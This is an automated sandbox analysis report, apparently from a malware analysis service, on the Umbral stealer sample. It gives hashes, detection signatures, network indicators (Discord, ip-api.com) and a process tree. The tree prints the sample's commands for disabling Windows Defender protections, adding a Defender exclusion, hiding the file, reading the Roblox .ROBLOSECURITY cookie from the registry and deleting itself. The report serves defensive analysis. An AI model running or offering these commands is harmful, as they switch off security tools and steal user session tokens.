Analysis
-
max time kernel
4s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-06-2024 05:05
Behavioral task
behavioral1
Sample
Umbral.exe
Resource
win7-20240221-en
General
-
Target
Umbral.exe
-
Size
229KB
-
MD5
aaf99a08d4968f6c8b4dffea65e508b5
-
SHA1
99d6d8d218dc7a07cb8dbf009ed474782babd4d9
-
SHA256
30ac9d27fe86c00f827876cb245deedf7f8f4cbb16f4359fda4beb0cf8183d73
-
SHA512
9bf219952fca4d62f85bf565804e03901ec9d2b77d59e8600f2276a867bd8e6b516f4ee68527b481f11ff4df6ed4da77a438de1c1f386f8eae54e7797a63e696
-
SSDEEP
6144:9loZM9rIkd8g+EtXHkv/iD4DcSP4+ZRSe3q459cgYb8e1mDi:foZOL+EP8DcSP4+ZRSe3q459clF
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/1032-1-0x00000000010A0000-0x00000000010E0000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1692 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1276 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1936 PING.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1032 Umbral.exe Token: SeDebugPrivilege 1692 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1032 wrote to memory of 2220 1032 Umbral.exe 28 PID 1032 wrote to memory of 2220 1032 Umbral.exe 28 PID 1032 wrote to memory of 2220 1032 Umbral.exe 28 PID 1032 wrote to memory of 1692 1032 Umbral.exe 30 PID 1032 wrote to memory of 1692 1032 Umbral.exe 30 PID 1032 wrote to memory of 1692 1032 Umbral.exe 30 PID 1032 wrote to memory of 2564 1032 Umbral.exe 32 PID 1032 wrote to memory of 2564 1032 Umbral.exe 32 PID 1032 wrote to memory of 2564 1032 Umbral.exe 32 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2220 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Views/modifies file attributes
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵PID:2944
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵PID:2740
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2488
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵PID:2788
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1276
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause2⤵PID:2308
-
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:1936
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6K9AP69OMK9RJC8BDMK8.temp
Filesize7KB
MD5d5ae352ab2f6a0c05cd31910f10c1a89
SHA1c0a935c5bb433a3d33a78ff3c36c15c763659930
SHA2564d204bcb7e458b9490fbe4e7028a948363350a8740f4286f1423d65c6082c796
SHA512301a02bad56d451213aa5114c11fdfd821d1f0c47e7a331c5529615c9ae7a68860ec8a7c05cbacc6257e50d91197620b4f4e2dbec1fc77d7d9f7e47e14f55e58